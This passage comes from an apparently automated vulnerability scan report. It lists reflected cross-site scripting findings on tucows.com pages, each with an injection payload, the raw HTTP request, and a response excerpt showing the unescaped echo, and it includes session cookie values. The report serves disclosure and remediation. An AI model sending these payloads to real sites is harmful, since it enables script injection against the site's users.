The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2a0f"-alert(1)-"d3b3f7c7cb3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /previewf2a0f"-alert(1)-"d3b3f7c7cb3/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:31:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=0a1b30a86b03c7fe7a0105c8c64ed6cc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0a1b30a86b03c7fe7a0105c8c64ed6cc=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/previewf2a0f"-alert(1)-"d3b3f7c7cb3/194850/x22";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.380. http://www.tucows.com/preview/194850/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 212c1"-alert(1)-"9b74dc28a7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preview/194850212c1"-alert(1)-"9b74dc28a7b/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:31:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4a96b6ea2fb1ff12ea5cbccab443adca; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4a96b6ea2fb1ff12ea5cbccab443adca=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/preview/194850212c1"-alert(1)-"9b74dc28a7b/x22";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.381. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd8d"><script>alert(1)</script>19ee22f0cfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /preview/194850/x222cd8d"><script>alert(1)</script>19ee22f0cfb HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b05ac0e6be85c735be622d4531a9aaf6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: b05ac0e6be85c735be622d4531a9aaf6=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 75004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<a name="own" href="http://www.tucows.com/preview/194850/x222cd8d"><script>alert(1)</script>19ee22f0cfb#frmAddCmt" class="leave_a_comment">
...[SNIP]...

1.382. http://www.tucows.com/preview/194850/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b7e"-alert(1)-"8990b025cf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preview/194850/x2246b7e"-alert(1)-"8990b025cf5 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f13532ef349cd28fcdd6b97f8ca27aca; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: f13532ef349cd28fcdd6b97f8ca27aca=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "194850";
pageTitle = "SmartDraw 7.61";
url = "http://www.tucows.com/preview/194850/x2246b7e"-alert(1)-"8990b025cf5";
_ARTICLE_ID = "";
_SOFTWARE_ID = "194850";
</script>
...[SNIP]...

1.383. http://www.tucows.com/preview/194850/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8153d"-alert(1)-"891c6dec5da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preview/194850/x22?8153d"-alert(1)-"891c6dec5da=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4ff504b2daba6b2fa5976c8353e088e5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4ff504b2daba6b2fa5976c8353e088e5=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "194850";
pageTitle = "SmartDraw 7.61";
url = "http://www.tucows.com/preview/194850/x22?8153d"-alert(1)-"891c6dec5da=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "194850";
</script>
...[SNIP]...

1.384. http://www.tucows.com/privacy.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3ab0"-alert(1)-"6b16cc9a4b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.htmla3ab0"-alert(1)-"6b16cc9a4b3 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/privacy.htmla3ab0"-alert(1)-"6b16cc9a4b3";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.385. http://www.tucows.com/privacy.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4b0"-alert(1)-"dc8c1805ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.html?2e4b0"-alert(1)-"dc8c1805ae=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 36886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/privacy.html?2e4b0"-alert(1)-"dc8c1805ae=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.386. http://www.tucows.com/sitemap.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edf7"-alert(1)-"26f2d744f54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap.html9edf7"-alert(1)-"26f2d744f54 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:33:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/sitemap.html9edf7"-alert(1)-"26f2d744f54";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.387. http://www.tucows.com/sitemap.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95630"-alert(1)-"ad45798eea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap.html?95630"-alert(1)-"ad45798eea4=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:31:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/sitemap.html?95630"-alert(1)-"ad45798eea4=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.388. http://www.tucows.com/software.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6930b"-alert(1)-"88848db90c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html6930b"-alert(1)-"88848db90c4 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html6930b"-alert(1)-"88848db90c4";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.389. http://www.tucows.com/software.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89730"-alert(1)-"ede5d633695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html?89730"-alert(1)-"ede5d633695=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html?89730"-alert(1)-"ede5d633695=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.390. http://www.tucows.com/software.html [pf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The value of the pf request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36557"-alert(1)-"b121e4a791 was submitted in the pf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html?t=689&pf=win36557"-alert(1)-"b121e4a791 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 55803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html?t=689&pf=win36557"-alert(1)-"b121e4a791";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.391. http://www.tucows.com/software.html [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
